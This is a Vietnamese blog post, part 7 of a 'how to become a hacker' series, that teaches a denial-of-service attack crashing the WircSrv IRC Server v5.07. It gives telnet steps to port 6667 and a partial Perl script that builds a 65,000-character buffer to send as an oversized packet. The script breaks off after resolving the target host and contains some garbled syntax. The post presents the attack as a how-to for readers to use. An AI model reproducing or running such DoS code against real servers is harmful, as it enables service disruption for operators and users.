Thứ Bảy, 30 tháng 1, 2016

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 7


42 . )  Kỹ thuật ấn công DoS vào WircSrv Irc Server v5.07 :
 
WircSrv IRC là một Server IRC thông dụng trên Internet ,nó sẽ bị Crash nếu như bị các Hacker gửi một Packet lớn hơn giá trị ( 65000 ký tự ) cho phép đến Port 6667.
 Bạn có thể thực hiện việc này bằng cách Telnet đến WircSrv trên Port 6667:


 
Nếu bạn dùng Unix:

 [hellme@die-communitech.net$ telnet irc.example.com 6667
 Trying example.com...
 Connected to example.com.
 Escape character is `^]`.
 [buffer]

 Windows cũng tương tự:

 telnet irc.example.com 6667

 Lưu ý: [buffer] là Packet dữ liệu tương đương với 65000 ký tự .
 Tuy nhiên , chúng ta sẽ crash nó rất đơn giản bằng đoạn mã sau ( Các bạn hãy nhìn vào đoạn mã và tự mình giải mã những câu lệnh trong đó , đó cũng là một trong những cách tập luyện cho sự phản xạ của các hacker khi họ nghiên cứu . Nào , chúng ta hãy phân tích nó một cách căn bản ):

 CODE
 #!/usr/bin/perl #< == Đoạn mã này cho ta biết là dùng cho các lệnh trong perl
 use Getopt::Std;
 use Socket;
 getopts(`s:`, \%args);
 if(!defined($args{s})){&usage;}
 my($serv,$port,$foo,$number,$data,$buf,$in_addr,$pa ddr,$proto);
 $foo = ``A``; # Đây là NOP
 $number = ``65000``; # Đây là tất cả số NOP
 $data .= $foo x $number; # kết quả của $foo times $number
 $serv = $args{s}; # lệnh điều khiển server từ xa
 $port = 6667; # lệnh điều khiển cổng từ xa , nó được mặc định là 6667
 $buf = ``$data``;
 $in_addr = (gethostbyname($serv))[4]

0 nhận xét: